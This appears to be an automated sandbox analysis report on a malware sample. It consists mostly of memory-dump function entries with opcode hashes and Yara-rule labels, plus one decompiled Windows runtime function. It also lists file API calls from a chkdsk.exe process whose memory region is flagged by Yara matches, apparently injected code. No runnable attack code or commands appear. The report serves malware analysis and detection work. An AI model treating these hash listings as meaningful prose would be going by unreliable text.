                                                            • Instruction ID: 5af7c26f40d60857d88766a2b22142e985b3434ca076347fb2104e5459abf6ed
                                                            • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                                            • Instruction Fuzzy Hash: 34C02B330C0248BBC7166F46DD00F117F6DE7A0B60F000020F6040B671C932EC60D5C8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 012E3A1C, Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                            • Instruction ID: a23b48ed9b8bd8d286760d11c143447df584b60ed5f87a2a260f07fa1ed5fd32
                                                            • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                                            • Instruction Fuzzy Hash: B0C08C32080288BBCB126E41DC00F117B69E7A0B60F000020BA080A5608532EC60D98C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 012D76E2, Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                            • Instruction ID: 6b613d982ab21ba9e1804cc76b8fe2ac2a89bed6c00a5b2e7bf224b67277be2d
                                                            • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                                            • Instruction Fuzzy Hash: A3C08C701A11825EEB2E570CCE24B307A90AB0860CF88019CAB01094E2D36CA802C288
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 012F36CC, Relevance: .0, Instructions: 10COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                            • Instruction ID: 0d8fc6b5744271ee3b470349d7c08a4516109c81588a938d94cd7c0c945f82b0
                                                            • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                                            • Instruction Fuzzy Hash: 0DC02B70170480FFDB156F30CD00F24B2D4F700A21FA403687320854F0D528DC00D50C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 012E7D50, Relevance: .0, Instructions: 7COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                            • Instruction ID: c38cd9e402216bfc490b473bd3cdb6c37e96630d498e2907ce44739c0ca6f1c4
                                                            • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                                            • Instruction Fuzzy Hash: FFB09235311942CFCE16DF18C084B1533E8BB44A40F8400D0E400CBA21D32AE8008900
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 012F2ACB, Relevance: .0, Instructions: 5COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                            • Instruction ID: 5a0124c324424514ba7891299b668fb3b8c527669462d7ec0f4df916990edb2c
                                                            • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                                            • Instruction Fuzzy Hash: B5B01232C20541CFCF02FF40C610B297331FB00750F06449090012B930C228BC01CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0130AD30, Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 76ed6859ba467e031def712ba9a40d312bf121e709d6373f788d62fb12c40c98
                                                            • Instruction ID: 38871af5a5ff3edeedec447352c0f7be3015841bac2a5d2d2ed9a0947d7ead86
                                                            • Opcode Fuzzy Hash: 76ed6859ba467e031def712ba9a40d312bf121e709d6373f788d62fb12c40c98
                                                            • Instruction Fuzzy Hash: 19900275A0501012D544719948186464406B7E1785B55C421A0504554CC9948A6963E1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01309520, Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 041a74bb9725fa68463bd974c8f8075486d1daca04967e775bd98a6870f3fb88
                                                            • Instruction ID: d2a7da4f0e25f8e6247e693ae4976febcc64162cd08a62f81b13d1ffc12ac4a6
                                                            • Opcode Fuzzy Hash: 041a74bb9725fa68463bd974c8f8075486d1daca04967e775bd98a6870f3fb88
                                                            • Instruction Fuzzy Hash: C99002E5201150928904A2998408B0A4905A7E1345B51C426E1044560CC5658865A175
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01309560, Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7848ab64cccbdf27e23f3ea87921e1f5fb345b9843ac0c1fc1a82ac6269c5b3b
                                                            • Instruction ID: da6ed29b4223349bff35b767ef14884f9474656191183c570d687b691d89413e
                                                            • Opcode Fuzzy Hash: 7848ab64cccbdf27e23f3ea87921e1f5fb345b9843ac0c1fc1a82ac6269c5b3b
                                                            • Instruction Fuzzy Hash: 8F900269221010024549A599060850B0845B7D7395391C425F1406590CC66188796361
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01309950, Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dee667bba821a137e044d059010fdf955fb60f82a330f7f12f15ca5a0b3e20f7
                                                            • Instruction ID: 7c3af462cf6d045dc2e6e3775a19200237cb0d1c8996e5dfe1dad5e2cbc58738
                                                            • Opcode Fuzzy Hash: dee667bba821a137e044d059010fdf955fb60f82a330f7f12f15ca5a0b3e20f7
                                                            • Instruction Fuzzy Hash: 799002A520141403D544659948086070405A7D1346F51C421A2054555ECA698C657175
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 013095F0, Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0aef16063e3311bed51db346036eb64993a8046c58dc727dd3f97606c7847f48
                                                            • Instruction ID: 146127ba377e78c1f843af9ea0294e58e951a8916b72f80e73eae57fa0e9e84c
                                                            • Opcode Fuzzy Hash: 0aef16063e3311bed51db346036eb64993a8046c58dc727dd3f97606c7847f48
                                                            • Instruction Fuzzy Hash: C190027520101802D508619948086860405A7D1345F51C421A6014655ED6A588A57171
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 013099D0, Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 01f35747f847b3e77a9c9bd355bc687029de3d5aa6c19350df66b75539c03045
                                                            • Instruction ID: dc65bbfc53d3a22b3b18fb6f48d7f1720abec74e082aacd7a40f306698b19c5f
                                                            • Opcode Fuzzy Hash: 01f35747f847b3e77a9c9bd355bc687029de3d5aa6c19350df66b75539c03045
                                                            • Instruction Fuzzy Hash: B19002A521101042D508619944087060445A7E2345F51C422A2144554CC5698C756165
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01309820, Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b0e88820a7e99ef475c6d014ebdb6e2aef1d0e66535682ef93ab86f75e70b476
                                                            • Instruction ID: a8e8f4231b41dfc3032920b8f1b7ae52afcc2fcd138785d4918543d3cf31f220
                                                            • Opcode Fuzzy Hash: b0e88820a7e99ef475c6d014ebdb6e2aef1d0e66535682ef93ab86f75e70b476
                                                            • Instruction Fuzzy Hash: F590027524101402D545719944086060409B7D1385F91C422A0414554EC6958A6ABAA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0130B040, Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d2d52e281404eec23fa97d29f8d51074f1f5aa0572b36beb09b9ef5cec2e65e4
                                                            • Instruction ID: 7dbf43c3fe44aece7c548a3e0586d462efd79169df008138055ea6cd102e7291
                                                            • Opcode Fuzzy Hash: d2d52e281404eec23fa97d29f8d51074f1f5aa0572b36beb09b9ef5cec2e65e4
                                                            • Instruction Fuzzy Hash: EC9002A5601150438944B19948084065415B7E2345391C531A0444560CC6A88869A2A5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 013098A0, Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b377f492f3885cb10921b5c2aa608edf0744f0e97e0e0f1ab23e5d1b9e0e63d8
                                                            • Instruction ID: 08bb7e90d150d3b1be341968f75cddc306ac77f225857ce35c07475ab870cd8a
                                                            • Opcode Fuzzy Hash: b377f492f3885cb10921b5c2aa608edf0744f0e97e0e0f1ab23e5d1b9e0e63d8
                                                            • Instruction Fuzzy Hash: 7E90026530101402D506619944186060409E7D2389F91C422E1414555DC6658967B172
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01309730, Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6aa93beb461dcc36b4a6734e3383bd8ad22db6950b5a8306b48c92f3c90151d8
                                                            • Instruction ID: 6f7cb8363dfbc835e7de91e329fe6d0b63c4bb255b581851ea8097c01fad49af
                                                            • Opcode Fuzzy Hash: 6aa93beb461dcc36b4a6734e3383bd8ad22db6950b5a8306b48c92f3c90151d8
                                                            • Instruction Fuzzy Hash: A490026560501402D5447199541C7060415A7D1345F51D421A0014554DC6998A6976E1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0130A710, Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fdb357f9efc631dd084d09c5fb39ef156e59b912fcd061660394725fd96e1849
                                                            • Instruction ID: 827719fb7ab7b37785cfe0217a096f39e3fbd1101dd3c4904e9af1720ab9832d
                                                            • Opcode Fuzzy Hash: fdb357f9efc631dd084d09c5fb39ef156e59b912fcd061660394725fd96e1849
                                                            • Instruction Fuzzy Hash: 1790027530101052D904A6D95808A4A4505A7F1345B51D425A4004554CC59488756161
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01309B00, Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 63f2634648613efb6768e2d4380e969f7aa96ae827393cca44ce5c6d2e236b48
                                                            • Instruction ID: 7fb035a1a2413589fcccf666919fdeb1852a3ab476d5a905332ace62d2a47ca4
                                                            • Opcode Fuzzy Hash: 63f2634648613efb6768e2d4380e969f7aa96ae827393cca44ce5c6d2e236b48
                                                            • Instruction Fuzzy Hash: C690026524101802D544719984187070406E7D1745F51C421A0014554DC656897976F1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01309770, Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a06f21a788ac7c6b28dc3ba99c0fe883f804ab7b777afd12d33980c6f1cd823b
                                                            • Instruction ID: 67adb8f486773aae831ebbeb60f3c84e7cc41c6a9eada2695a2096a02155d099
                                                            • Opcode Fuzzy Hash: a06f21a788ac7c6b28dc3ba99c0fe883f804ab7b777afd12d33980c6f1cd823b
                                                            • Instruction Fuzzy Hash: 7590026520505442D5046599540CA060405A7D1349F51D421A1054595DC6758865B171
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0130A770, Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7eddc2db431eec1d7a53e63c336010d96382ca14a437e010e583ade461f0c284
                                                            • Instruction ID: 6f04dbd8d1be34cdaf45c122b8aa65b5e90f56b2459fb91ce69a8737658810e5
                                                            • Opcode Fuzzy Hash: 7eddc2db431eec1d7a53e63c336010d96382ca14a437e010e583ade461f0c284
                                                            • Instruction Fuzzy Hash: BF90027920505442D90465995808A870405A7D1349F51D821A041459CDC6948875B161
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01309760, Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 22a7b3e9d66a96f08fd1985963110b46d63407f561c5499d771308552b31a5d2
                                                            • Instruction ID: ede2742b648f95dd26fadc47fe9014ff810222e6447faedf6a200a611d8c5a42
                                                            • Opcode Fuzzy Hash: 22a7b3e9d66a96f08fd1985963110b46d63407f561c5499d771308552b31a5d2
                                                            • Instruction Fuzzy Hash: F290027520101403D5046199550C7070405A7D1345F51D821A0414558DD69688657161
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0130A3B0, Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ecfd6d94182ab58a221d9e58cd823d9ce13e3173701ad59e83cbfbbe785ad006
                                                            • Instruction ID: b65f4f09cf0bc54eb742201c51806bf76b6a6893d75c4f04129cff69e6425ea5
                                                            • Opcode Fuzzy Hash: ecfd6d94182ab58a221d9e58cd823d9ce13e3173701ad59e83cbfbbe785ad006
                                                            • Instruction Fuzzy Hash: AF90027520145002D5447199844860B5405B7E1345F51C821E0415554CC655886AA261
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01309610, Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ba63956297cc33e8fb050e3a5bf778a8bf57a256403407f96a1ef3b390f8ae73
                                                            • Instruction ID: 5d3c4b87ee0630ea9bcee067b21fab7248fe4495c1f18760ff988f1af96cb04a
                                                            • Opcode Fuzzy Hash: ba63956297cc33e8fb050e3a5bf778a8bf57a256403407f96a1ef3b390f8ae73
                                                            • Instruction Fuzzy Hash: 3E90027560501802D554719944187460405A7D1345F51C421A0014654DC7958A6976E1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01309A10, Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1f1747afce598d4b12a17829c05f050401cfb383a81ec542b9261728ecba1340
                                                            • Instruction ID: 0f1d43bf42128bd450ba022355354ed7b162f904d1bf09fe1165fa0251d386e7
                                                            • Opcode Fuzzy Hash: 1f1747afce598d4b12a17829c05f050401cfb383a81ec542b9261728ecba1340
                                                            • Instruction Fuzzy Hash: 5C90027520141402D5046199480C7470405A7D1346F51C421A5154555EC6A5C8A57571
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01309650, Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a43554a7e5f1679e84eb1e98aee6a367235a097019403033412e100d9e33f996
                                                            • Instruction ID: 32e9587b7d161dc1c813073c8676a08cd8eef4222e4a03811026c536119a7af5
                                                            • Opcode Fuzzy Hash: a43554a7e5f1679e84eb1e98aee6a367235a097019403033412e100d9e33f996
                                                            • Instruction Fuzzy Hash: E190027520505842D54471994408A460415A7D1349F51C421A0054694DD6658D69B6A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01309A80, Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 771361274485398706d8b36495c4ea77f43f3424f250f326b715e9a7102d2018
                                                            • Instruction ID: f1f06c079a0b3bcb653bd5d0c3e8bed54e525df85bbaf85b178badf8f10f9e36
                                                            • Opcode Fuzzy Hash: 771361274485398706d8b36495c4ea77f43f3424f250f326b715e9a7102d2018
                                                            • Instruction Fuzzy Hash: CF90026520145442D54462994808B0F4505A7E2346F91C429A4146554CC95588696761
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 013096D0, Relevance: .0, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1bd1a59a4be5bbeca61b1472b4d0f0f8c652fff35494a9ef430d7d1a11df459c
                                                            • Instruction ID: 3a8e3832a441e5dbedf0deabf6be17cc86013848f09f7ea4caaab01f13e0685c
                                                            • Opcode Fuzzy Hash: 1bd1a59a4be5bbeca61b1472b4d0f0f8c652fff35494a9ef430d7d1a11df459c
                                                            • Instruction Fuzzy Hash: AE90027520101842D50461994408B460405A7E1345F51C426A0114654DC655C8657561
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 01309670, Relevance: .0, Instructions: 2COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                            • Instruction ID: 04ecf686a11e89cb9957f9afea7c912be5bf82e231fb4e0740bcdab2a700d994
                                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                            • Instruction Fuzzy Hash:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0135FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 53%
                                                            			E0135FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0130CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01355720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01355720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                            0x0135fdda
                                                            0x0135fde2
                                                            0x0135fde5
                                                            0x0135fdec
                                                            0x0135fdfa
                                                            0x0135fdff
                                                            0x0135fe0a
                                                            0x0135fe0f
                                                            0x0135fe17
                                                            0x0135fe1e
                                                            0x0135fe19
                                                            0x0135fe19
                                                            0x0135fe19
                                                            0x0135fe20
                                                            0x0135fe21
                                                            0x0135fe22
                                                            0x0135fe25
                                                            0x0135fe40

                                                            APIs
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0135FDFA
                                                            Strings
                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0135FE2B
                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0135FE01
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.442491013.00000000012A0000.00000040.00000001.sdmp, Offset: 012A0000, based on PE: true
                                                            Similarity
                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                            • API String ID: 885266447-3903918235
                                                            • Opcode ID: ed9f3c480f6fb73e1577791c59af5fcc4fe7405d7689e77a623c60d9357cb04e
                                                            • Instruction ID: 68ffe4a54bcb3d0377e39107f23522caa546c49ee3498720b2b8fde0bd33a360
                                                            • Opcode Fuzzy Hash: ed9f3c480f6fb73e1577791c59af5fcc4fe7405d7689e77a623c60d9357cb04e
                                                            • Instruction Fuzzy Hash: 82F0F632200201BFE7611A49DC02F63BF5EEB44B74F240314FA28565D1EA62F86097F0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Analysis Process: chkdsk.exe PID: 6464 Parent PID: 3440 chkdsk.exeCOMMON

                                                            Executed Functions

                                                            Function 00AC85EB, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42filenativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,00AC3BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00AC3BC7,007A002E,00000000,00000060,00000000,00000000), ref: 00AC863D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, Offset: 00AB0000, based on PE: false
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID: .z`
                                                            • API String ID: 823142352-1441809116
                                                            • Opcode ID: ff5d448eff0e32eb58a503c0a23eb2a23968ac6f405612a2d4973c508889f361
                                                            • Instruction ID: 99d1d8f53844aa4c5922296a1a4527edd695abdae3b22ca9043f6106622964c8
                                                            • Opcode Fuzzy Hash: ff5d448eff0e32eb58a503c0a23eb2a23968ac6f405612a2d4973c508889f361
                                                            • Instruction Fuzzy Hash: 2001AFB2245108AFCB48CF98DC95EEB77A9AF8C354F158248FA1D97241D630E851CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00AC85F0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,00AC3BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00AC3BC7,007A002E,00000000,00000060,00000000,00000000), ref: 00AC863D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, Offset: 00AB0000, based on PE: false
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID: .z`
                                                            • API String ID: 823142352-1441809116
                                                            • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                            • Instruction ID: 713f313ab21c9ed85f6a13ccd10493d4238f01f3df0755e833e7ff8db241b692
                                                            • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                            • Instruction Fuzzy Hash: EBF0BDB2200208AFCB48CF88DC85EEB77ADAF8C754F158248BA0D97241C630E811CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00AC871A, Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtClose.NTDLL(00AC3D60,?,?,00AC3D60,00000000,FFFFFFFF), ref: 00AC8745
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, Offset: 00AB0000, based on PE: false
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID:
                                                            • API String ID: 3535843008-0
                                                            • Opcode ID: e38eaebc72375dbc8d4f18041b72683b0b7b1fa2d1be8f78124c1b96cf0a84cb
                                                            • Instruction ID: dca152c0be98b594708fb05382890608f76d7225ad23e11cace207e7378d3ac8
                                                            • Opcode Fuzzy Hash: e38eaebc72375dbc8d4f18041b72683b0b7b1fa2d1be8f78124c1b96cf0a84cb
                                                            • Instruction Fuzzy Hash: 12015A76200208AFDB14DF98CC85EEB77A9EF88310F158558BE0CAB242C630E910CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00AC86A0, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtReadFile.NTDLL(00AC3D82,5E972F65,FFFFFFFF,00AC3A41,?,?,00AC3D82,?,00AC3A41,FFFFFFFF,5E972F65,00AC3D82,?,00000000), ref: 00AC86E5
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, Offset: 00AB0000, based on PE: false
                                                            Yara matches
